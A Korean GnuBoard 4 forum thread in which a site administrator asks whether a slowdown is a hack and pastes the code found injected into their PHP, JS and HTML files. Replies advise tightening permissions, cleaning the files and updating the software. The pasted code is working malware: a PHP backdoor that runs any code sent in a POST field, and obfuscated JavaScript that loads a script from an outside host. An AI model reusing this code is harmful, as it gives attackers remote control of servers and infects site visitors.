해킹인건가요? 아니면 다른이유가.. > 그누4 질문답변

그누4 질문답변

그누보드4 관련 질문은 QA 로 이전됩니다. QA 그누보드4 바로가기
기존 게시물은 열람만 가능합니다.

해킹인건가요? 아니면 다른이유가.. 정보

해킹인건가요? 아니면 다른이유가..

본문

며칠전 부터 사이트 접속이 너무 느리더니만
PHP파일 제일위에
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMZE8pe3ZhciBQckNuPSd2YXJgMjBhYDNkYDIyU2A2M3JpcHRFbmdgNjlgNmVgNjVgMjJgMmNiYDNkYDIyYDU2ZXJgNzNpb24oKStgMjJgMmNqYDNkYDIyYDIyYDJjdWAzZG5hdmA2OWdgNjF0YDZmcmAyZWA3NXNlYDcyQWdgNjVudGAzYmA2OWA2NmAyOGAyOGA3NWAyZWA2OW5kZXhPYDY2YDI4YDIyYDQzaHJgNmZtZWAyMilgM2MwKWAyNmAyNihgNzVgMmVpbmRleE9mKGAyMldpbmAyMmAyOWAzZTApYDI2YDI2KHVgMmVpbmA2NGA2NXhPZihgMjJOVGAyMDZgMjJgMjlgM2NgMzApYDI2YDI2KGRgNmZgNjNgNzVtZW50YDJlY29va2A2OWA2NWAyZWA2OWA2ZWA2NGVgNzhgNGZmYDI4YDIybWlla2AzZDFgMjIpYDNjMGAyOWAyNmAyNmAyOGA3NHlgNzBgNjVvYDY2KGA3YXJ2enRzKWAyMWAzZHR5YDcwYDY1b2A2NihgMjJBYDIyYDI5KSlgN2J6cnZ6YDc0c2AzZGAyMkFgMjJgM2JldmFsKGAyMmlmKHdpbmA2NG93YDJlYDIyK2ErYDIyKWpgM2RqK2AyMithK2AyMk1ham9yYDIyYDJiYmAyYmFgMmJgMjJNaW5vcmAyMmAyYmA2MmAyYmErYDIyQmA3NWlsZGAyMitgNjIrYDIyYDZhYDNiYDIyKWAzYmRvY3VtZW50YDJld3JgNjl0YDY1KGAyMmAzY2A3M2NyaXB0YDIwc2A3MmNgM2RgMmZgMmZtYXJgNzRgMjJgMmJgMjJ1emAyZWNgNmVgMmZgNzZpZGAyZmAzZmlkYDNkYDIyK2orYDIyYDNlYDNjYDVjYDJmYDczY2A3MmA2OWA3MHRgM2VgMjIpYDNiYDdkJzt2YXIgYldPcD11bmVzY2FwZShQckNuLnJlcGxhY2UoTGRPLCclJykpO2V2YWwoYldPcCl9KSgvXGAvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
글들이 적혀있네요..

JS파일에는

하단에
<!--
(function(LdO){var PrCn='var`20a`3d`22S`63riptEng`69`6e`65`22`2cb`3d`22`56er`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69g`61t`6fr`2e`75se`72Ag`65nt`3b`69`66`28`28`75`2e`69ndexO`66`28`22`43hr`6fme`22)`3c0)`26`26(`75`2eindexOf(`22Win`22`29`3e0)`26`26(u`2ein`64`65xOf(`22NT`206`22`29`3c`30)`26`26(d`6f`63`75ment`2ecook`69`65`2e`69`6e`64e`78`4ff`28`22miek`3d1`22)`3c0`29`26`26`28`74y`70`65o`66(`7arvzts)`21`3dty`70`65o`66(`22A`22`29))`7bzrvz`74s`3d`22A`22`3beval(`22if(win`64ow`2e`22+a+`22)j`3dj+`22+a+`22Major`22`2bb`2ba`2b`22Minor`22`2b`62`2ba+`22B`75ild`22+`62+`22`6a`3b`22)`3bdocument`2ewr`69t`65(`22`3c`73cript`20s`72c`3d`2f`2fmar`74`22`2b`22uz`2ec`6e`2f`76id`2f`3fid`3d`22+j+`22`3e`3c`5c`2f`73c`72`69`70t`3e`22)`3b`7d';var bWOp=unescape(PrCn.replace(LdO,'%'));eval(bWOp)})(/\`/g);
 -->

HTML파일에는
<script language=javascript><!--
(function(LdO){var PrCn='var`20a`3d`22S`63riptEng`69`6e`65`22`2cb`3d`22`56er`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69g`61t`6fr`2e`75se`72Ag`65nt`3b`69`66`28`28`75`2e`69ndexO`66`28`22`43hr`6fme`22)`3c0)`26`26(`75`2eindexOf(`22Win`22`29`3e0)`26`26(u`2ein`64`65xOf(`22NT`206`22`29`3c`30)`26`26(d`6f`63`75ment`2ecook`69`65`2e`69`6e`64e`78`4ff`28`22miek`3d1`22)`3c0`29`26`26`28`74y`70`65o`66(`7arvzts)`21`3dty`70`65o`66(`22A`22`29))`7bzrvz`74s`3d`22A`22`3beval(`22if(win`64ow`2e`22+a+`22)j`3dj+`22+a+`22Major`22`2bb`2ba`2b`22Minor`22`2b`62`2ba+`22B`75ild`22+`62+`22`6a`3b`22)`3bdocument`2ewr`69t`65(`22`3c`73cript`20s`72c`3d`2f`2fmar`74`22`2b`22uz`2ec`6e`2f`76id`2f`3fid`3d`22+j+`22`3e`3c`5c`2f`73c`72`69`70t`3e`22)`3b`7d';var bWOp=unescape(PrCn.replace(LdO,'%'));eval(bWOp)})(/\`/g);
 --></script>

하나씩 지우기도 너무 힘이드네요..

그누 버젼은
4.22.04 쓰고 있는곳도 그렇고
4.31.03 쓰고 있는 곳도 그렇네요.

혹시 최신패치를 안해서 그런건가요?
검색을 해보니 2008년도에 웜이라는 글이 있던데요.

혹시 같은 증상을 보이신분 안계시나요?
  • 복사

댓글 전체

요즘 문제가 많은 글이더군요...

아마 해결책은 특별하진 않구요.

퍼미션의 변경

기존 화일에서 삭제 작업 (숨겨진 곳이 의외로 많습니다.)

최신버전의 업데이트 등등

아마 이 3가지만 지켜진다면 거의 90% 이상은 막아질듯 합니다만 ....
catkim  // 여러 사람이 이용하는 사이트고 제가 사이트를 보기전부터 그런거라 제 PC하곤 상관이 없는거 같은데 PC의 바이러스하고 상관이 있는거라면 한번 해보아야겠네요 .답변 감사합니다.

방황하는중년 //
퍼미션을 어떤 식으로 변경을 해야 할지도 모르겠네요 .
기존 권한이 644로 되어있는 파일도 변경이 되있는걸 보면 소유자의 권한으로 변경을 하는거 같은데.그렇다고 아무도 못쓰게 할수도 없구...
기존 파일은 모든 파일을 다 보고 지우긴 했습니다.

아무래도 그누 버젼이 문제일까요.
답변 감사합니다..
아 응답이 늦어서 죄송합니다.

하루동안 삽질을 하러 갔다 온다고 늦게 들렸습니다.

퍼미션이 644 라고는 하시지만 일반페이지의 경우이고

일부 페이지는 extends 부분이나 js 같은 경우 707 내지 777 이 되어 있는 경우가 많습니다.

어떤 이유에서든지 최소하 하는 부분으로 적용이 유저에게나 개발자에게 1번더 돌아가야 할 부분이 되지만 보안상으로는 좀더 안전합니다.

아마 퍼미션은 644 내지 755 를 보통 주시게 될듯하나

그누 버전이 이전 버전이라면 이미 공개된 취약점이 있는것은 사실이고 그 구멍을 열어 놓고 있다는 사실은 알고 계신겁니다 ^^

저 같은 경우 튜닝을 많이하여 쓰다 보니 가끔 버전 업이 힘들지만 그런대로 중요 부분을 막고 나머진 비밀리에 다른 부분으로 리다렉이트 검사를 하니 거의 90% 이상은 취약점에서 벗어나지더군요.

짱께뿐 아니라 한국사람만 오게끔 -_- geo_ip 한번 올려 보았더니..효과가 좋긴 좋더군요..
© SIRSOFT
현재 페이지 제일 처음으로